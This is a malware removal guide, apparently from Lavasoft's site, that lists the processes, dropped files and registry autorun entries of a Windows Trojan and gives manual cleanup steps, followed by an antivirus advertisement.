  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    SecondL.exe:3236
    wyrm4bnfuck.exe:2968
    OneTwo.exe:840
    up.exe:3864
    %original file name%.exe:3676

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe (68980 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp (1569 bytes)
    %Program Files%\58NPSAZXWZ\58NPSAZXW.exe (69780 bytes)
    %Program Files%\58NPSAZXWZ\uninstaller.exe (2590 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
    %Program Files%\58NPSAZXWZ\58NPSAZXW.exe.config (1 bytes)
    %Program Files%\58NPSAZXWZ\uninstaller.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
    %Program Files%\58NPSAZXWZ\cast.config (37 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe.config (1 bytes)
    C:\config.conf (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe (145806 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll (1489 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll (1502 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll (88 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "HJ2O0Z2VCIVQCDU" = "%Program Files%\58NPSAZXWZ\58NPSAZXW.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_A1904" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "4147223" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe /VERYSILENT"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now